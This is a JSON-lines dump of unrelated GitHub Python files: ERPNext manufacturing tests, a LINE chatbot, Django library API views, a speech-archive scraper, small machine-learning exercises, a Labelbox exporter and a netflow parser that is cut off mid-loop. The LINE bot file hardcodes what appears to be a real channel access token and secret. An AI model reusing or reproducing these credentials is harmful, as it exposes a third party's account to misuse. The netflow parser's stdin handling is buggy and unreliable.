basic_rate=100\n\t\t)\n\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", skip_getting_mr_items=True)\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\t\two = make_wo_order_test_record(\n\t\t\titem_code=\"Test Production Item 1\",\n\t\t\tqty=1,\n\t\t\tcompany=pln.company,\n\t\t\twip_warehouse=\"Work In Progress - _TC\",\n\t\t\tfg_warehouse=\"Finished Goods - _TC\",\n\t\t\tskip_transfer=1,\n\t\t\tuse_multi_level_bom=1,\n\t\t\tdo_not_submit=True,\n\t\t)\n\t\two.production_plan = pln.name\n\t\two.production_plan_item = pln.po_items[0].name\n\t\two.submit()\n\n\t\tse = frappe.get_doc(make_se_from_wo(wo.name, \"Manufacture\", 1))\n\t\tse.submit()\n\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 0)\n\n\t\tse.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\tdef test_qty_based_status(self):\n\t\tpp = frappe.new_doc(\"Production Plan\")\n\t\tpp.po_items = [frappe._dict(planned_qty=5, produce_qty=4)]\n\t\tself.assertFalse(pp.all_items_completed())\n\n\t\tpp.po_items = [\n\t\t\tfrappe._dict(planned_qty=5, produce_qty=10),\n\t\t\tfrappe._dict(planned_qty=5, produce_qty=4),\n\t\t]\n\t\tself.assertFalse(pp.all_items_completed())\n\n\tdef test_production_plan_planned_qty(self):\n\t\tpln = create_production_plan(item_code=\"_Test FG Item\", planned_qty=0.55)\n\t\tpln.make_work_order()\n\t\twork_order = frappe.db.get_value(\"Work Order\", {\"production_plan\": pln.name}, \"name\")\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t)\n\t\two_doc.submit()\n\t\tself.assertEqual(wo_doc.qty, 0.55)\n\n\tdef test_temporary_name_relinking(self):\n\n\t\tpp = frappe.new_doc(\"Production Plan\")\n\n\t\t# this can not be unittested so mocking data that would be expected\n\t\t# from client side.\n\t\tfor _ in range(10):\n\t\t\tpo_item = pp.append(\n\t\t\t\t\"po_items\",\n\t\t\t\t{\n\t\t\t\t\t\"name\": frappe.generate_hash(length=10),\n\t\t\t\t\t\"temporary_name\": frappe.generate_hash(length=10),\n\t\t\t\t},\n\t\t\t)\n\t\t\tpp.append(\"sub_assembly_items\", {\"production_plan_item\": po_item.temporary_name})\n\t\tpp._rename_temporary_references()\n\n\t\tfor po_item, subassy_item in zip(pp.po_items, pp.sub_assembly_items):\n\t\t\tself.assertEqual(po_item.name, subassy_item.production_plan_item)\n\n\t\t# bad links should be erased\n\t\tpp.append(\"sub_assembly_items\", {\"production_plan_item\": frappe.generate_hash(length=16)})\n\t\tpp._rename_temporary_references()\n\t\tself.assertIsNone(pp.sub_assembly_items[-1].production_plan_item)\n\t\tpp.sub_assembly_items.pop()\n\n\t\t# reattempting on same doc shouldn't change anything\n\t\tpp._rename_temporary_references()\n\t\tfor po_item, subassy_item in zip(pp.po_items, pp.sub_assembly_items):\n\t\t\tself.assertEqual(po_item.name, subassy_item.production_plan_item)\n\n\ndef create_production_plan(**args):\n\t\"\"\"\n\tsales_order (obj): Sales Order Doc Object\n\tget_items_from (str): Sales Order/Material Request\n\tskip_getting_mr_items (bool): Whether or not to plan for new MRs\n\t\"\"\"\n\targs = frappe._dict(args)\n\n\tpln = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"Production Plan\",\n\t\t\t\"company\": args.company or \"_Test Company\",\n\t\t\t\"customer\": args.customer or \"_Test Customer\",\n\t\t\t\"posting_date\": nowdate(),\n\t\t\t\"include_non_stock_items\": args.include_non_stock_items or 0,\n\t\t\t\"include_subcontracted_items\": args.include_subcontracted_items or 0,\n\t\t\t\"ignore_existing_ordered_qty\": args.ignore_existing_ordered_qty or 0,\n\t\t\t\"get_items_from\": \"Sales Order\",\n\t\t}\n\t)\n\n\tif not args.get(\"sales_order\"):\n\t\tpln.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"use_multi_level_bom\": args.use_multi_level_bom or 1,\n\t\t\t\t\"item_code\": args.item_code,\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", args.item_code, \"default_bom\"),\n\t\t\t\t\"planned_qty\": args.planned_qty or 1,\n\t\t\t\t\"planned_start_date\": args.planned_start_date or now_datetime(),\n\t\t\t},\n\t\t)\n\n\tif args.get(\"get_items_from\") == \"Sales Order\" and args.get(\"sales_order\"):\n\t\tso = args.get(\"sales_order\")\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so.name,\n\t\t\t\t\"sales_order_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"grand_total\": so.grand_total,\n\t\t\t},\n\t\t)\n\t\tpln.get_items()\n\n\tif not args.get(\"skip_getting_mr_items\"):\n\t\tmr_items = get_items_for_material_requests(pln.as_dict())\n\t\tfor d in mr_items:\n\t\t\tpln.append(\"mr_items\", d)\n\n\tif not args.do_not_save:\n\t\tpln.insert()\n\t\tif not args.do_not_submit:\n\t\t\tpln.submit()\n\n\treturn pln\n\n\ndef make_bom(**args):\n\targs = frappe._dict(args)\n\n\tbom = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"BOM\",\n\t\t\t\"is_default\": 1,\n\t\t\t\"item\": args.item,\n\t\t\t\"currency\": args.currency or \"USD\",\n\t\t\t\"quantity\": args.quantity or 1,\n\t\t\t\"company\": args.company or \"_Test Company\",\n\t\t\t\"routing\": args.routing,\n\t\t\t\"with_operations\": args.with_operations or 0,\n\t\t}\n\t)\n\n\tfor item in args.raw_materials:\n\t\titem_doc = frappe.get_doc(\"Item\", item)\n\n\t\tbom.append(\n\t\t\t\"items\",\n\t\t\t{\n\t\t\t\t\"item_code\": item,\n\t\t\t\t\"qty\": args.rm_qty or 1.0,\n\t\t\t\t\"uom\": item_doc.stock_uom,\n\t\t\t\t\"stock_uom\": item_doc.stock_uom,\n\t\t\t\t\"rate\": item_doc.valuation_rate or args.rate,\n\t\t\t\t\"source_warehouse\": args.source_warehouse,\n\t\t\t},\n\t\t)\n\n\tif not args.do_not_save:\n\t\tbom.insert(ignore_permissions=True)\n\n\t\tif not args.do_not_submit:\n\t\t\tbom.submit()\n\n\treturn bom\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/manufacturing/doctype/production_plan/test_production_plan.py","file_name":"test_production_plan.py","file_ext":"py","file_size_in_byte":25191,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"25399242747","text":"#載入LineBot所需要的套件\r\nfrom flask import Flask, request, abort\r\n\r\nfrom linebot import (\r\n LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n InvalidSignatureError\r\n)\r\nfrom linebot.models import *\r\n\r\napp = Flask(__name__)\r\n\r\n# 必須放上自己的Channel Access Token\r\nline_bot_api = LineBotApi('cVuxUh37rdpZfzeIxlzBacx+9nDM/eej2DOry4cVwJDGWF0tkWrQhTKgLnxS5iDzLNybhSrXf/d4iloPvHANce0/akvAUAad1h7BUcIKGHVigu4pvRIWgjD/BwfymT15PwjelfRpr+QJWTpXSkBOfgdB04t89/1O/w1cDnyilFU=')\r\n\r\n# 必須放上自己的Channel Secret\r\nhandler = WebhookHandler('460f3260ada98363f7b7959b227ec32f')\r\n\r\n\r\n# 監聽所有來自 /callback 的 Post Request\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n # get X-Line-Signature header value\r\n signature = request.headers['X-Line-Signature']\r\n\r\n \r\n # get request body as text\r\n body = request.get_data(as_text=True)\r\n app.logger.info(\"Request body: \" + body)\r\n\r\n # handle webhook body\r\n try:\r\n handler.handle(body, signature)\r\n except InvalidSignatureError:\r\n abort(400)\r\n\r\n return 'OK'\r\n\r\n \r\n#訊息傳遞區塊\r\n##### 基本上程式編輯都在這個function #####\r\n@handler.add(MessageEvent, message=ImageMessage)\r\ndef handle_message(event):\r\n from bttr.lit_bttr import LitBTTR\r\n from PIL import Image\r\n from torchvision.transforms import ToTensor\r\n \r\n # 請api用get_message_content依照訊息id將圖片要回\r\n message_content = line_bot_api.get_message_content(event.message.id)\r\n \r\n # 請api回覆已經上傳\r\n line_bot_api.reply_message(\r\n event.reply_token,\r\n TextSendMessage(text='Image has Upload'+ ' ' + event.message.id + '\\n' + str(message_content)))\r\n\r\n#主程式\r\nimport os\r\nif __name__ == \"__main__\":\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', port=port)\r\n","repo_name":"jelishu0423/LineBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23277435491","text":"from hangman import Hangman\nfrom tictactoe import TicTacToe\n\ndef main():\n while True:\n game = input(\"Please select a game to play:\\n\"\n \"Type H to play Hangman\\n\"\n \"Type T to play Tic Tac Toe\\n\"\n \"Type Q to quit\\n\")\n if game == \"H\":\n new_game = Hangman(\"Hangman\", \"Will you escape the noose?\")\n new_game.play_game()\n elif game == \"T\":\n new_game = TicTacToe(\"Tic Tac Toe\", \"Can you outsmart me?\")\n new_game.play_game()\n elif game == \"Q\":\n print(\"Goodbye :'(\")\n quit()\n else:\n print(\"Sorry, that was not a valid selection.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vhartvik/games","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13574285288","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\n author:jjk\n datetime:2020/02/05\n coding:utf-8\n project name:test/pandas\n Program function: \n\n\"\"\"\nimport pandas as pd\nimport numpy as np\nget_ipython().run_line_magic('matplotlib', 'inline')\n# 1. map用于Series值的转换\n# 实例:将古朴代买英文转换成中文名字\n# Series.map(dict) or Series.map(function)均可\nstocks = pd.read_excel('./datas/stocks/互联网公司股票.xlsx')\nstocks.head()\n\n\n# In[2]:\n\n\nstocks['公司'].unique()\n\n\n# In[5]:\n\n\n# 公司股票代码到中文的映射,注意这里是小写\ndict_company_names = {\n 'bidu':'百度',\n 'baba':'阿里巴巴',\n 'iq':'爱奇艺',\n 'jd':'京东'\n}\n\n\n# In[6]:\n\n\n# 方法1:Series.map(dict)\nstocks['公司中文'] = stocks['公司'].str.lower().map(dict_company_names)\nstocks.head()\n\n\n# In[8]:\n\n\n# 方法2:Series.map(function)\n# function的参数是Series的每个元组的值\nstocks['公司中文2'] = stocks['公司'].map(lambda x : dict_company_names[x.lower()])\nstocks.head()\n\n\n# In[9]:\n\n\n# 2、apply用于Series和DataFrame的转换\n# Series.apply(function),函数的参数为每个值\n# DataFrame.apply(function),函数的参数是Series\n\n\n# In[10]:\n\n\n# Series.apply(function),函数的参数为每个值\nstocks['公司中文3'] = stocks['公司'].apply(lambda x : dict_company_names[x.lower()])\nstocks.head()\n\n\n# In[14]:\n\n\n# DataFrame.apply(function),函数的参数是Series\n# stocks.apply的stocks是一个dataframe,\n# 扫描是跨列的\nstocks['公司名称4'] = stocks.apply(\n lambda x : dict_company_names[x['公司'].lower()],\n axis=1)\nstocks.head()\n\n\n# In[16]:\n\n\n# 注意这个代码:\n#1. apply是在stocks这个dataframe上调用\n#2. lambda x的x是一个series,因为指定了axis=1,所以series的key是列名,可以用x['公司']获取\n\n\n# In[18]:\n\n\n# 3、applymap用于dataframe所有值的转换\nsub_df = stocks[['收盘','开盘','高','低','交易量']]\nsub_df.head()\n\n\n# In[19]:\n\n\n# 将整个数字取整数,应用于所有元素\nsub_df.applymap(lambda x : int(x))\n\n\n# In[20]:\n\n\n# 直接修改原df的这几列\nstocks.loc[:,['收盘','开盘','高','低','交易量']] = sub_df.applymap(lambda x : int(x))\nstocks.head()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"jiajikang-nlp/pandas","sub_path":"15-pandas的数据转换函数.py","file_name":"15-pandas的数据转换函数.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29198806056","text":"from all.api.serializers import *\nfrom all.models import *\nfrom rest_framework import generics, parsers\nfrom django.db import connection\nfrom django.shortcuts import get_object_or_404\n\n\nclass LoanCreate(generics.CreateAPIView):\n queryset = Loan.objects.all()\n serializer_class = LoanSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve loan data from serializer\n loan_data = serializer.validated_data\n\n # Extract book name and member name from the loan data\n book_name = loan_data.get('book')\n member_name = loan_data.get('member')\n loan_date = loan_data.get('loan_date')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle loan creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL create_loan(%s, %s, %s, NULL)',\n [book_id, member_id, loan_date]\n )\n\n\nclass ReservationCreate(generics.CreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve reservation data from serializer\n reservation_data = serializer.validated_data\n\n # Extract book name and member name from the reservation data\n book_name = reservation_data.get('book')\n member_name = reservation_data.get('member')\n reservation_date = reservation_data.get('reservation_date')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle reservation creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL create_reservation(%s, %s, %s, NULL)',\n [book_id, member_id, reservation_date]\n )\n\n\nclass ReviewCreate(generics.CreateAPIView):\n queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve review data from serializer\n review_data = serializer.validated_data\n\n # Extract book name and member name from the review data\n book_name = review_data.get('book')\n member_name = review_data.get('member')\n review_date = review_data.get('review_date')\n comment = review_data.get('comment')\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle review creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL add_review(%s, %s, %s, %s, NULL)',\n [book_id, member_id, comment, review_date]\n )\n\n\nclass FavoriteCreate(generics.CreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve favorite data from serializer\n favorite_data = serializer.validated_data\n\n # Extract book name and member name from the favorite data\n book_name = favorite_data.get('book')\n member_name = favorite_data.get('member')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle favorite creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL add_to_favorites(%s, %s, NULL)',\n [book_id, member_id]\n )\n\n\nclass LoanReturn(generics.UpdateAPIView):\n queryset = Loan.objects.all()\n serializer_class = LoanForReturnSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def get_object(self):\n # Retrieve loan based on provided book title and member name\n book_title = self.request.data.get('book')\n member_name = self.request.data.get('member')\n try:\n book = Book.objects.get(book_id=book_title)\n member = Member.objects.get(member_id=member_name)\n loan = Loan.objects.get(book=book, member=member)\n return loan\n except (Book.DoesNotExist, Member.DoesNotExist, Loan.DoesNotExist):\n # Handle book, member, or loan not found error\n raise serializers.ValidationError(\"Book, member, or loan not found\")\n\n def perform_update(self, serializer):\n loan = self.get_object()\n\n # Call PostgreSQL stored procedure to handle loan return\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL handle_return(%s)',\n [loan.loan_id]\n )\n","repo_name":"tdhung-03/ie103_library","sub_path":"all/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36914204696","text":"# Retrieve talks by speaker on speeches.byu.edu using BeautifulSoup\n\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport pandas as pd\nimport re\n\n'''Get list of urls for each of the topics For my reference, number of talks by speaker: Nelson - 22, Maxwell - 30, \nHolland - 27, Hinckley - 41, Monson - 14, Oaks - 35, Eyring - 25 (Total - 194)'''\nurl = \"https://speeches.byu.edu/speakers/\"\n\nurl_list = [\n 'russell-m-nelson/', 'neal-a-maxwell/', 'jeffrey-r-holland/', 'gordon-b-hinckley/', 'thomas-s-monson/',\n 'dallin-h-oaks', 'henry-b-eyring'\n]\n\nlinks = []\nnew_links = []\n\n''' some of the links are repeated with '?M=V' and '?M=A' and those will be removed so we can have a unique set of \nlinks to pull talk information from.'''\n\nfor u in url_list:\n response = requests.get(url + u)\n html = response.content\n video = '?M=V'\n soup = bs(html, 'lxml')\n for link in soup.findAll(\"a\", attrs={'href': re.compile(\"^https://speeches.byu.edu/talks/[\\D+]\")}):\n links.append(link.get('href').replace(video, ''))\n\n audio = '?M=A'\n for link in links:\n new_link = link.replace(audio, '')\n new_links.append(new_link)\n new_links = list(set(new_links))\n\nprint(len(new_links))\n\n'''Retrieves talk text from each of the urls using beautiful soup. Information such as the talk/sermon text, title, \ntopic, date, and speaker will be retrieved and put into a dataframe. A csv file will also be saved due to the time \nit takes to run or in case we need to work offline. '''\n\ntalk_text = []\nspeakers = []\n\nfor link in new_links:\n url = link\n response = requests.get(url)\n html = response.content\n soup = bs(html, 'lxml')\n temp_list = []\n\n link_splitter = link.split('/')\n speakers.append(link_splitter[4].replace('-', ' '))\n\n for div in soup.find_all('div', class_='single-speech__content'):\n talk_text.append(div.get_text(strip=True))\n\ndict_speeches_byu = {'speaker': speakers, 'talks': talk_text}\ndf = pd.DataFrame(dict_speeches_byu)\n\nprint(df.sample(15))\n\n# Now to pull information from the church general conference website.\n\n# Get list of urls for each of the topics\ngc_url = \"https://www.churchofjesuschrist.org/study/general-conference/speakers/\"\n\ngc_url_list = [\n 'russell-m-nelson/', 'neal-a-maxwell/', 'jeffrey-r-holland/', 'gordon-b-hinckley/', 'thomas-s-monson/',\n 'dallin-h-oaks', 'henry-b-eyring'\n]\n\nlinks = []\n\nfor u in gc_url_list:\n response = requests.get(gc_url + u)\n html = response.content\n soup = bs(html, 'lxml')\n for link in soup.findAll(\"a\", attrs={'href': re.compile(\"^/study/general-conference/\\w+/(?:\\w+/)(?:\\w+)\")}):\n links.append(link.get('href'))\n\ntalk_text = []\nspeakers = []\n\nfor link in links:\n url = 'https://www.churchofjesuschrist.org'+link\n response = requests.get(url)\n html = response.content\n soup = bs(html, 'lxml')\n\n sermon_name = soup.find_all('div', class_='byline')\n '''This is basically a switch statement that will allow for the speaker column to have the same format as the \n dataframe speeches.byu.edu dataframe created above.'''\n for x in sermon_name:\n if 'nelson' in x.find('p').text.lower():\n speakers.append('russell m nelson')\n elif 'maxwell' in x.find('p').text.lower():\n speakers.append('neal a maxwell')\n elif 'holland' in x.find('p').text.lower():\n speakers.append('jeffrey r holland')\n elif 'hinckley' in x.find('p').text.lower():\n speakers.append('gordon b hinckley')\n elif 'monson' in x.find('p').text.lower():\n speakers.append('thomas s monson')\n elif 'oaks' in x.find('p').text.lower():\n speakers.append('dallin h oaks')\n else:\n speakers.append('henry b eyring')\n\n for div in soup.find_all('div', class_='body-block'):\n talk_text.append(div.get_text(separator= ' ', strip=True))\n\ndict_gc = {'speaker': speakers,'talks': talk_text}\ndf_gc = pd.DataFrame(dict_gc)\n\nprint(df_gc.sample(15))\n\ndf = df.append(df_gc)\ndf.to_csv('talk_corpus.csv')\nprint(df.sample(50))","repo_name":"ramsey-king/DSC-680-Applied-Data-Science","sub_path":"Project-1/KingR_680_P1_dataset_collection.py","file_name":"KingR_680_P1_dataset_collection.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71545153192","text":"import random\nimport torch\nimport numpy as np\nimport pandas\nimport matplotlib.pyplot as p\nfrom torch.utils import data\nfrom torch import nn\n#from d2l import torch as d2l\n\ndef synthetic_data(w,b,num_example): # return X,y\n X = torch.normal(0,1,(num_example,len(w))) # X is a matrix with the size of num_example * len(w)\n y = torch.matmul(X,w) + b\n y += torch.normal(0,0.01,y.shape)\n return X,y.reshape((-1,1)) #让y成为列向量,不过在这个例子里面直接return也行,因为w为列向量\ntrue_w = torch.tensor([2,-3.4])\ntrue_b = 4.2\nfeatures,labels = synthetic_data(true_w,true_b,1000)\n\ndef load_array(data_arrays,batch_size,shuffle_in_train = True):\n dataset = data.TensorDataset(*data_arrays)\n return data.DataLoader(dataset,batch_size,shuffle_in_train)\n\nbatch_size = 10\ndata_iter = load_array((features,labels),batch_size)\n\nnet = nn.Sequential(nn.Linear(2,1))\nnet[0].weight.data.normal_(0,0.01)\nnet[0].bias.data.fill_(0)\n\n#loss = nn.MSELoss()\nloss = nn.HuberLoss()\n\ntrainer = torch.optim.SGD(net.parameters(),lr = 0.03)\n\nnum_epochs = 10\nfor epoch in range(num_epochs):\n for X,y in data_iter:\n l = loss(net(X),y)\n trainer.zero_grad()\n l.backward()\n trainer.step()\n l = loss(net(features),labels)\n print(f'epoch {epoch+1}, loss {l:f}')","repo_name":"SaltedFish23/Test","sub_path":"Dive_into_dl/linear_regression2.py","file_name":"linear_regression2.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22746526326","text":"import numpy as np\nfrom math import sqrt\nfrom collections import Counter\nfrom .metrics import accuracy_score\n\nclass KNN_Classify():\n\tdef __init__(self, k):\n\t\t\"\"\" 初始化KNN分类器 \n\t\t\"\"\"\n\t\tassert k >= 1, \"k must be valid\"\n\t\tself.k = k\n\t\tself._X_train = None\n\t\tself._y_train = None\n\t\n\tdef fit(self, X_train, y_train):\n\t\t\"\"\" 根据训练数据集X_train和y_train训练KNN分类器 \n\t\t\"\"\"\n\t\tassert X_train.shape[0] == y_train.shape[0], \\\n\t\t\"The size of X_train must be equal to the size of y_train\"\n\t\tassert self.k <= X_train.shape[0], \\\n\t\t\"The size of X_train must be at least k.\"\n\t\t\n\t\tself._X_train = X_train\n\t\tself._y_train = y_train\n\t\treturn self\n\t\n\tdef predict(self, X_predict):\n\t\t\"\"\" 给定待预测数据集X_predict,返回表示X_predict的结果向量 \n\t\t\"\"\"\n\t\tassert X_predict.ndim >= 2, (\"X_predict expected 2D array, got 1D array instead: array=%s.\\n\" %X_predict + \\\n\t\t\"Reshape your data either using array.reshape(-1, 1) if your data has a single feature or array.reshape(1, -1) if it contains a single sample\")\n\t\tassert self._X_train is not None and self._y_train is not None, \\\n\t\t\"must fit before predict !\"\n\t\tassert X_predict.shape[1] == self._X_train.shape[1], \\\n\t\t\"the feature of X_predict must be equal to X_train\"\n\t\t\n\t\ty_predict = np.array([self._predict(x) for x in X_predict])\n\t\treturn y_predict\n\t\n\tdef _predict(self, x):\n\t\t\"\"\" 给定单个���预测数据x(向量),返回x的预测结果 \n\t\t\"\"\"\n\t\tassert x.shape[0] == self._X_train.shape[1], \\\n\t\t\"the feature of x must be equal to X_train\"\n\t\t\n\t\t# 样例x与训练集中各元素的距离(欧拉距离)\n\t\tdistances = [sqrt(np.sum((x_train - x)**2)) for x_train in self._X_train] \n\t\n\t\t# 距离由小到大排列后元素对应的索引\n\t\tnearest = np.argsort(distances)\n\t\n\t\t# 前k个索引所属的类别\n\t\ttopK_y = [self._y_train[i] for i in nearest[:self.k]]\n\t\n\t\t# 汇总类别出现的次数\n\t\tvotes = Counter(topK_y)\n\t\n\t\t# 找出得票最多的那个\n\t\treturn votes.most_common(1)[0][0]\n\t\n\tdef score(self, X_test, y_test):\n\t\t''' 根据测试数据集 X_test 和 y_test 确定当前模型的准确度\n\t\t'''\n\t\ty_predict = self.predict(X_test)\n\t\treturn accuracy_score(y_test, y_predict)\n\n\tdef __repr__(self):\n\t\treturn \"KNN(k=%d)\" %self.k\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n","repo_name":"wang-orange/python-project","sub_path":"MachineLearning/playML/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18432185964","text":"\nimport json\nimport os\nimport requests\n\ndataset_name = \"Axillary_dataset_\"\ntrain_dir = \"train\"\nimages_dir = \"images\"\nmasks_dir = \"masks\"\nexport_path = \"C:\\\\Users\\\\Noam Suissa\\\\Downloads\"\n\ndef download_image(pic_url, path):\n with open(path, 'wb') as handle:\n response = requests.get(pic_url, stream=True)\n\n if not response.ok:\n print(response, path)\n\n for block in response.iter_content(1024):\n if not block:\n break\n\n handle.write(block)\n\n#create dirs\npath = os.path.join(export_path, dataset_name)\n\npath2 = os.path.join(path, train_dir)\n\npath3 = os.path.join(path2, images_dir)\n\npath4 = os.path.join(path2, masks_dir)\n\nif not os.path.exists(path):\n\tos.mkdir(path)\n\tos.mkdir(path2)\n\tos.mkdir(path3)\n\tos.mkdir(path4)\n\n#open labelbox json\nfp = open(\"C:\\\\Users\\\\Noam Suissa\\\\Downloads\\\\Axillary_train.json\")\n\njsn = json.load(fp)\n\n#populate dirs\nfor i in jsn:\n\t\n\tid_ = i[\"ID\"]\n\toriginal_img_url = i[\"Labeled Data\"]\n\tobjects = i[\"Label\"][\"objects\"]\n\n\t#download original image\n\tdownload_path = path3 + '/' +id_ + '.png'\n\tif not os.path.exists(download_path):\n\t\tdownload_image(original_img_url, download_path)\n\n\tim_path = os.path.join(path4, id_)\n\tif not os.path.exists(im_path):\n\t\tos.mkdir(im_path)\n\n\t#download masks\n\tfor o in objects:\n\t\tname = o[\"value\"]\n\t\tlink = o[\"instanceURI\"]\n\t\tob_path = os.path.join(im_path, name)\n\t\t\n\t\tif not os.path.exists(ob_path):\n\t\t\tos.mkdir(ob_path)\n\t\t\n\t\tobj_download_path = ob_path + '/' +id_ + '.png'\n\t\tif not os.path.exists(obj_download_path):\n\t\t\tdownload_image(link, obj_download_path)\n\n","repo_name":"noamsuissa/Labelbox-Image-Exporter","sub_path":"train_exporter.py","file_name":"train_exporter.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71812134633","text":"import json\nimport struct\nimport sys\nimport time\nimport logging\nimport geoip2.database\n\ndef transform_records():\n while True:\n byte_len = sys.stdin.read()\n #if len(byte_len) == 8:\n byte_len = struct.unpack(\"L\", byte_len)\n result = sys.stdin.read(byte_len)\n yield result\n #else:\n # assert len(byte_len) == 0, byte_len\n # return\n\nfor records in transform_records():\n flows = json.loads(records)\n exported_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(flows[\"Header\"][\"ExportTime\"]))\n \n try:\n for flow in flows[\"DataSets\"]:\n sourceIPAddress = \"unknown\"\n destinationIPAddress = \"unknown\"\n bgpSourceAsNumber = \"unknown\"\n bgpDestinationAsNumber = \"unknown\"\n protocolIdentifier = 0\n sourceTransportPort = 0\n destinationTransportPort = 0\n tcpControlBits = \"unknown\"\n ipNextHopIPAddress = \"unknown\"\n octetDeltaCount = 0\n ingressInterface = 0\n egressInterface = 0\n ASNumber= \"\"\n CountryCode= 0\n for field in flow:\n if field[\"I\"] in [214]:\n raise\n elif field[\"I\"] in [8, 27]:\n sourceIPAddress = field[\"V\"]\n elif field[\"I\"] in [12, 28]:\n destinationIPAddress = field[\"V\"]\n elif field[\"I\"] in [15, 62]:\n ipNextHopIPAddress = field[\"V\"]\n elif field[\"I\"] == 16:\n bgpSourceAsNumber = field[\"V\"]\n elif field[\"I\"] == 17:\n bgpDestinationAsNumber = field[\"V\"]\n elif field[\"I\"] == 14:\n ingressInterface = field[\"V\"]\n elif field[\"I\"] == 10:\n egressInterface = field[\"V\"]\n elif field[\"I\"] == 7:\n 